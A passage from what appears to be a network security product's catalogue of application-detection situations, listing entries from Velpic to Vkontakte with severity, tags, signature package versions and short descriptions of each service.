Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Velpic operates an online platform that provides a cloud based training, induction, and education solution for businesses.
Back to top

Vembu

About this situation: Application Vembu detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Storage, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Vembu cloud Backup and Disaster Recovery, File Share and CRM. Designed for Small Businesses.
Back to top

Vend

About this situation: Application Vend detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Marketing, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Vend is a cloud-based point of sale provider written in HTML5. It is operated from any device or platform with a web-browser.
Back to top

Venda

About this situation: Application Venda detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Venda is an outsourced and on-demand platform, offering B2B, B2C, and business to enterprise e-commerce solutions.
Back to top

Vendini

About this situation: Application Vendini detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Vendini provides ticketing, patron management, marketing, and fundraising solutions for organizations.
Back to top

Vendormate

About this situation: Application Vendormate detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Vendormate helps healthcare providers and suppliers form and optimize their business relationships with simplified and streamlined processes.
Back to top

VendorRisk

About this situation: Application VendorRisk detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: VendorRisk is web-based software to help small- to mid-sized organizations manage their vendors, contracts, and related IT services and assets.
Back to top

Venmo

About this situation: Application Venmo detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Finance, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Venmo is a peer-to-peer mobile payment service that makes paying friends simple and fast. Venmo works on iPhone, Android, Blackberry, via text on any mobile device, or on desktop.
Back to top

Venngage

About this situation: Application Venngage detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Venngage is tool and helps you make Infographic Designs and Themes.
Back to top

Ventuno

About this situation: Application Ventuno detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Ventuno is an online and mobile video solution provider. It provides a content syndication platform and its technology solution is cloud based video platform and video ad server.
Back to top

VentureDeal

About this situation: Application VentureDeal detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: VentureDeal is a comprehensive venture capital database updated daily with the latest information on U.S. technology startup companies, venture capital firms and company transactions.
Back to top

VentureLoop

About this situation: Application VentureLoop detected
Context: Application Context
Severity: 1
Tags: Cloud Services, HR, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: VentureLoop is website dedicated to job postings for emerging venture-backed companies and startup companies.
Back to top

VenueManager

About this situation: Application VenueManager detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Venue Manager is a web based ticketing reservation system.
Back to top

Venustech

About this situation: Application Venustech detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Venustech is a provider of network security products, trusted security management platforms, and specialized security services and solutions.
Back to top

Veoh

About this situation: Veoh usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Media, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1764-5242
Description: Veoh.com is a website that allows users to watch television videos from their personal devices or download a player for larger devices.
Back to top

Veracart

About this situation: Application Veracart detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Veracart is a hosted shopping cart technology that helps merchants sell products online.
Back to top

Veracode

About this situation: Application Veracode detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Application security company offering a cloud-based platform for application risk management. The core technology of Veracode's service is a static code analysis engine that analyzes compiled applications for security flaws.
Back to top

Verax-NMS

About this situation: Application Verax-NMS detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Verax Systems provides a comprehensive set of integrated applications covering the entire lifecycle from service definition through provisioning and monitoring to billing.
Back to top

Veriato

About this situation: Application Veriato detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Veriato provides employee monitoring and behavior analytics software for business, government and education.
Back to top

VeriClock

About this situation: Application VeriClock detected
Context: Application Context
Severity: 1
Tags: Cloud Services, HR, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Vericlock is a web-based timekeeping system that accurately records time and attendance for hourly employees who work off-site.
Back to top

Verify

About this situation: Application Verify detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Marketing, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Verify allow collect data and analyze user feedback with design surveys. Verify lets you quickly upload any screenshot or image to father user feedback on your designs.
Back to top

Verint

About this situation: Application Verint detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Verint solutions capture, distill, and analyze complex and underused information sources (such as voice, video, and unstructured text) to help organizations make timely and effective decisions.
Back to top

Verio-Hosted-Exchange

About this situation: Application Verio-Hosted-Exchange detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Verio provides web hosting, application hosting and SaaS applications for SMBs worldwide. Verio's Hosted Microsoft Exchange includes the hardware and software licensing, plus free copies of Outlook or Entourage. Verio offers the new Microsoft Exchange 2010, ActiveSync for mobile devices, calendar and contact sharing and anti-spam filters.
Back to top

VeriShow

About this situation: Application VeriShow detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: VeriShow is a live support and collaboration platform designed to meet the needs of organizations who want the option to interact in person when conducting business online.
Back to top

Verisign-CRL

About this situation: Verisign CRL service usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Infrastructure Services, Application Routing
First detected in: sgpkg-ips-603-5211
Last changed: sgpkg-ips-773-5211
Description: Certificate Revocation Lists are used to check validity of individual certificates with HTTPS.
Back to top

Verisign-OCSP

About this situation: Verisign Online Certificate Status service usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Infrastructure Services, Application Routing
First detected in: sgpkg-ips-437-4219
Last changed: sgpkg-ips-758-5211
Description: Online Certitificate Status Protocol (OCSP) is used to validate status of Extended Validation Certificates (EV certificates) used with HTTPS.
Back to top

Verisure-IQ

About this situation: Verisure IQ usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-627-5211
Last changed: sgpkg-ips-627-5211
Description: Verisure IQ is a property alarm service run by Verisure (also known as Securitas Direct).
Back to top

Veritas Quick Assist

About this situation: Endpoint Context Agent based Veritas Quick Assist detection
Context: EI Correlation
Severity: 1
Tags: Business Apps, Endpoint
First detected in: sgpkg-ips-992-5242
Last changed: sgpkg-ips-992-5242
Description: Veritas Quick Assist endpoint application was detected. Quick Assist collects diagnostic information from applications developed by Veritas and provides support.
Back to top

Verizon-Enterprise-Solutions

About this situation: Application Verizon-Enterprise-Solutions detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Hosting, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Verizon Enterprise Solutions is a division of Verizon Communications that provides services and products for Verizon's business and government clients around the world.
Back to top

Verizon-Wireless

About this situation: Application Verizon-Wireless detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Verizon Wireless offers wireless telecommunications services, devices, and solutions.
Back to top

Versadial-Solutions

About this situation: Application Versadial-Solutions detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Versadial Solutions is a software development consulting firm. It offers software development focus to the multi-channel voice recording industry.
Back to top

Versionone

About this situation: VersionOne usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Office, Application Routing
First detected in: sgpkg-ips-609-5211
Last changed: sgpkg-ips-1764-5242
Description: VersionOne is an all-in-one agile project management tool built from the ground up to support agile software development methodologies such as Scrum, Kanban, Lean etc.
Back to top

Vertica

About this situation: Application Vertica detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: HP Vertica is the provider of next-generation analytics platforms enabling companies to monetize their data in real time. Vertica's scalability and flexibility are unmatched in the industry delivering 50x - 1000x faster performance at 30percent the cost of traditional solutions.
Back to top

Verticalive

About this situation: Application Verticalive detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: VerticaLive delivers a foundation technology to enable the rapid development of new SaaS apps on the Microsoft cloud ecosystem.
Back to top

Verticalresponse

About this situation: VerticalResponse usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Mail, Application Routing
First detected in: sgpkg-ips-631-5211
Last changed: sgpkg-ips-1764-5242
Description: This software allows users to sending email marketing, online surveys, and direct mail for direct marketing campaigns. Source: Wikipedia
Back to top

VESK

About this situation: Application VESK detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: VESK are provider of Hosted Virtual Desktops in the UK.
Back to top

Vestorly

About this situation: Application Vestorly detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Vestorly is a technology company. Our mission is to power up the digital efforts of professional service providers in the wealth management industry.
Back to top

Via3

About this situation: VIA3 usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Office, Application Routing
First detected in: sgpkg-ips-567-5211
Last changed: sgpkg-ips-1010-5242
Description: VIA3 delivers live audio, video, instant messaging, application viewing and sharing, whiteboarding, and secure workspaces directly from the desktop, over any public or private IP network, whether fixed, mobile or wireless.
Back to top

Viadeo

About this situation: Viadeo usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Social Networking, Application Routing
First detected in: sgpkg-ips-451-4333
Last changed: sgpkg-ips-630-5211
Description: Viadeo is a Web 2.0 professional social network with over 30 million members worldwide.
Back to top

viaPeople

About this situation: Application viaPeople detected
Context: Application Context
Severity: 1
Tags: Cloud Services, HR, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: viaPeople - provide customized HR software and consulting: 360 degree feedback, performance management and development, surveys and talent management solutions.
Back to top

Viaplay

About this situation: Viaplay usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Media, Application Routing
First detected in: sgpkg-ips-503-5211
Last changed: sgpkg-ips-1677-5242
Description: Viaplay is an on-demand video streaming service over the Internet, operated by Viasat.
Back to top

ViaPost

About this situation: Application ViaPost detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: ViaPost is an alternative mail service that allows you to send physical post direct from your PC to any UK address. It is a secure, high-quality and confidential way of printing and posting that saves you both time and money.
Back to top

ViArt-Software

About this situation: Application ViArt-Software detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: ViArt Software provides the tools to make use of the Internet in business. It helps to set up online store without the need for programming knowledge.
Back to top

Vibeapp

About this situation: Application Vibeapp detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Vibe provides search system to help find the person behind any email address. From an email address, Vibe will find Name, designation, Work History, Social Media handle, Topics of Interest and more. Vibe provides a social snapshot of people. A complete profile of people.
Back to top

VibeCatch

About this situation: Application VibeCatch detected
Context: Application Context
Severity: 1
Tags: Cloud Services, HR, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: VibeCatch is a job satisfaction poll service for CEOs and HR leaders to keep track of your teams satisfaction and gather feedback without extra effort then VibeCatch is for you.
Back to top

Viber

About this situation: Viber usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Chat, Application Routing
First detected in: sgpkg-ips-595-5211
Last changed: sgpkg-ips-1116-5242
Description: Viber is an application for smartphones that lets users to chat, call, and share video and photo messages.
Back to top

Vibesconnect.com

About this situation: VibesConnect.com usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Social Networking, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1764-5242
Description: A web-based social networking service which allows users to connect and share information with each other online.
Back to top

Vice

About this situation: Vice usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Media, Application Routing
First detected in: sgpkg-ips-602-5211
Last changed: sgpkg-ips-1764-5242
Description: Vice usage detected. Vice is a gonzo-style online magazine.
Back to top

viCloning

About this situation: Application viCloning detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Viclone is business tool to help reduce costs, increase sales and enhance customer experience.
Back to top

VictorOps

About this situation: Application VictorOps detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: VictorOps provides a real-time incident management platform focusing on incident lifecycle management and collaboration for IT and DevOps teams.
Back to top

Viddler

About this situation: Viddler usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Media, Application Routing
First detected in: sgpkg-ips-392-4219
Last changed: sgpkg-ips-1678-5242
Description: Viddler is an interactive online video platform for uploading and sharing videos.
Back to top

Viddy

About this situation: Viddy usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Media, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1764-5242
Description: is a simple way to share well-produced, bite-size videos with the world.
Back to top

Vidyard

About this situation: Application Vidyard detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Marketing, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Vidyard helps using video as an online marketing tool by integrating configuration, security and analytics into a unified solution.
Back to top

Vidyo

About this situation: Vidyo usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Office, Application Routing
First detected in: sgpkg-ips-695-5211
Last changed: sgpkg-ips-1010-5242
Description: Vidyo is a video conferencing service.
Back to top

View 3D

About this situation: Endpoint Context Agent based View 3D detection
Context: EI Correlation
Severity: 1
Tags: Media, Endpoint
First detected in: sgpkg-ips-993-5242
Last changed: sgpkg-ips-993-5242
Description: View 3D endpoint application detected. View 3D is a object viewer for Microsoft Windows.
Back to top

Viewpath

About this situation: Application Viewpath detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Viewpath is an on-demand, visually oriented project management solution that empowers individuals to take control of their daily workflow
Back to top

Viewpoint

About this situation: Application Viewpoint detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Viewpoint Construction offering construction-specific enterprise resource planning, project and BIM collaboration, mobile field-to-office and content management. Available as cloud, SaaS, and on-premise solutions
Back to top

Vigil

About this situation: Application Vigil detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Vigil is a website monitoring and downtime notification application.
Back to top

Viglink

About this situation: VigLink usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-629-5211
Last changed: sgpkg-ips-1764-5242
Description: VigLink outbound-traffic monetization service for publishers, forums, and bloggers, which specializes in in-text advertising and marketing.
Back to top

Vimeo

About this situation: Vimeo usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Media, Application Routing
First detected in: sgpkg-ips-392-4219
Last changed: sgpkg-ips-769-5211
Description: Vimeo is a U.S.-based video-sharing website on which users can upload, share and view videos.
Back to top

Vindicia

About this situation: Application Vindicia detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Finance, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Vindicia provides SaaS-based subscription billing and recurring revenue solutions to various brands across the globe.
Back to top

Vine

About this situation: Vine usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Photo/Video Sharing, Application Routing
First detected in: sgpkg-ips-579-5211
Last changed: sgpkg-ips-636-5211
Description: Vine is a mobile app owned by Twitter that enables its users to create and post short looping video clips. Video clips created with Vine have a maximum clip length of six seconds and can be shared to Vine's social network, or to other services such as Twitter and Facebook.
Back to top

Vines-Online-Solution

About this situation: Application Vines-Online-Solution detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Vines Online Solution is an eCommerce solution for wineries that helps to give control of wine ecommerce, wine clubs, event ticketing, and website updates.
Back to top

VinSolutions

About this situation: Application VinSolutions detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: VinSolutions an developer of Internet-based Customer Relations Management
Back to top

Viocorp

About this situation: Application Viocorp detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Viocorp is a cloud based video platform that provides brands and suite of solutions to engage audiences with video.
Back to top

Violence

About this situation: Sites that feature or promote violence or bodily harm, including self-inflicted harm; or that gratuitously display images of death, gore or injury; or that feature images or descriptions that are grotesque or frightening and of no redeeming value.
Context: URL Application Context
Severity: 1
Tags: Violence, Legal Liability
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: Sites that feature or promote violence or bodily harm, including self-inflicted harm; or that gratuitously display images of death, gore or injury; or that feature images or descriptions that are grotesque or frightening and of no redeeming value.
Back to top

VipaSuite

About this situation: Application VipaSuite detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Marketing, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Vipa Solutions partners with marketing and PR agencies by serving as their backbone for the development and launch of interactive web solutions.
Back to top

ViPNet-VPN

About this situation: ViPNet VPN usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Tunneling
First detected in: sgpkg-ips-623-5211
Last changed: sgpkg-ips-623-5211
Description: ViPNet VPN is an IP VPN software that allows users to fulfil flexible VPN scenarios for mobile users or to build secure virtual departments within their network.
Back to top

Viral Video

About this situation: Sites that host videos with high or rapidly rising popularity.
Context: URL Application Context
Severity: 1
Tags: Bandwidth, Network Bandwidth Loss, Productivity Loss
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: Sites that host videos with high or rapidly rising popularity.
Back to top

Viralheat-(Argyle-Social)

About this situation: Application Viralheat-(Argyle-Social) detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Marketing, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Viralheat is the enterprise content marketing and social media management platform that provides digital marketers with social media monitoring, publishing, analytics, content intelligence, and reporting in a single, intuitive interface.
Back to top

Viravis-Online-Database-Application-Platform

About this situation: Application Viravis-Online-Database-Application-Platform detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Viravis is online database application platform that helps you to develop online softwares without programming.
Back to top

Virgin-Mobile-USA

About this situation: Application Virgin-Mobile-USA detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Virgin Mobile USA is a prepaid wireless voice, messaging, and mobile broadband service provider in the contiguous United States, Hawaii and Puerto Rico under the Virgin Mobile, payLo and Assurance Wireless brands. Virgin Mobile USA is a wholly owned subsidiary of Sprint Corporation.
Back to top

Virto-Commerce

About this situation: Application Virto-Commerce detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Virto Commerce is an enterprise .NET eCommerce platform for building customized solutions.
Back to top

Virtual-Benefits-Administrator

About this situation: Application Virtual-Benefits-Administrator detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Finance, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Virtual Benefits Administrator
Back to top

Virtual-PBX

About this situation: Application Virtual-PBX detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: VirtualPBX hosted pbx business phone system
Back to top

VirtualBox

About this situation: Endpoint Context Agent based VirtualBox detection
Context: EI Correlation
Severity: 1
Tags: Business Apps, Endpoint
First detected in: sgpkg-ips-989-5242
Last changed: sgpkg-ips-989-5242
Description: VirtualBox endpoint application has been detected. VirtualBox is a hypervisor developed by Oracle Corporation.
Back to top

VirtualMerchant

About this situation: Application VirtualMerchant detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Finance, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: The VirtualMerchant application is a server-based system that supports transaction processing in real-time. The application allows use of a standard web-browser to process transactions as a cost-effective payment solution.
Back to top

Virtualmin

About this situation: Application Virtualmin detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Virtualmin
Back to top

Virtual_Context_Throughput-Exceeded

About this situation: virtual context throughput exceeded
Context: Firewall Events
Severity: 10
Tags: NGFW
First detected in: sgpkg-ips-838-5242
Last changed: sgpkg-ips-838-5242
Description: Throughput for virtual context limit exceeded. More details can be found from the "Information Messsage" field.
Back to top

Virustotal

About this situation: Virustotal usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-602-5211
Last changed: sgpkg-ips-630-5211
Description: Virustotal is a service that allows scanning of suspicious files with a set of antivirus and antimalware products.
Back to top

VisionFlow

About this situation: Application VisionFlow detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: VisionFlow is a very flexible web-based software suite with modules for Issue Tracking, Help Desk, CRM, Time Management, Document management, Product and Release management, Asset Management and much more.
Back to top

Visionhelpdesk

About this situation: VisionHelpdesk usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Office, Application Routing
First detected in: sgpkg-ips-645-5211
Last changed: sgpkg-ips-1764-5242
Description: Multi Domain Customer Service Help Desk Software and Multi Channel Ticketing Software.
Back to top

VisiStat

About this situation: Application VisiStat detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: VisiStat provides sales automation solution, is like Caller-ID for website. It identifies anonymous website visitors and provides this information to customer. It helps upgrade marketing strategy by tracking online campaigns.
Back to top

VisitorTrack

About this situation: Application VisitorTrack detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Marketing, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: VisitorTrack is Powerful technology integrates Web Tracking, Lead Capture and Sales Intelligence into a single tool for B2B lead generation.
Back to top

Visma-Severa

About this situation: Visma Severa usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, ERP/CRM, Application Routing
First detected in: sgpkg-ips-629-5211
Last changed: sgpkg-ips-1764-5242
Description: This web CRM allows users to keep track of clients and prospects, add tasks, track communication logs, and close deals.
Back to top

Vista-Cinema

About this situation: Application Vista-Cinema detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Vista creates cinema management solutions for the international cinema exhibition industry.
Back to top

Vista-Print

About this situation: Application Vista-Print detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Marketing, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Vistaprint is an online supplier of printed and promotional material and marketing services to micro businesses and consumers, specializing in print on demand products.
Back to top

Vistage-Connect

About this situation: Application Vistage-Connect detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Vistage is a business networking organization that helps CEOs and executives grow their businesses by making better decisions and achieving better results.
Back to top

Visual Studio Redistributable Package

About this situation: Endpoint Context Agent based Visual C++ Redistributable Package detection
Context: EI Correlation
Severity: 1
Tags: Framework, Endpoint
First detected in: sgpkg-ips-982-5242
Last changed: sgpkg-ips-989-5242
Description: A network connection initiated by Visual C++ Redistributable Package detected. The Visual C++ Redistributable Packages are used for installing required components for running Visual Studio applications.
Back to top

Visual-2000-ERP

About this situation: Application Visual-2000-ERP detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Visual 2000 is the enterprise resource planning Software solution for Apparel manufacturers and importers. Designed specifically for the Sewn Products industry.
Back to top

Visual-Revenue

About this situation: Visual Revenue usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Statistics, Application Routing
First detected in: sgpkg-ips-574-5211
Last changed: sgpkg-ips-628-5211
Description: Visual Revenue is an online statistics and analytics service.
Back to top

Visualsoft-eCommerce

About this situation: Application Visualsoft-eCommerce detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Visualsoft eCommerce is a digital agency specialising in the design, development and marketing of eCommerce websites.
Back to top

Visualwebsiteoptimizer

About this situation: visualwebsiteoptimizer usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-629-5211
Last changed: sgpkg-ips-1764-5242
Description: This software allows users to create different versions of a website or landing page and see analytics of visitor activity.
Back to top

Vitalist

About this situation: Application Vitalist detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Vitalist is a task and project manager designed to work with the
Back to top

Vitelity-Communications

About this situation: Application Vitelity-Communications detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Vitelity is wholesaler of VoIP, vFax, and SMS services. We provide products for your SMB or residential customers including DID, vFax, Hosted PBX, e911, SMS, and more.
Back to top

Vivantio-Service-Desk

About this situation: Application Vivantio-Service-Desk detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Vivantio Service Desk is the helpdesk solution for small business to empower your team and your customers. Manage your helpdesk better to reduce workload and improve customer service.
Back to top

Vivocha

About this situation: Application Vivocha detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Vivocha is a cloud service that enables businesses to seamlessly communicate with customers right on the website, using any combination of VoIP, chat, callbacks and collaboration tools like assisted browsing and form sharing.
Back to top

Vkontakte

About this situation: Vkontakte usage detected
Context: Application Context
Severity: 1
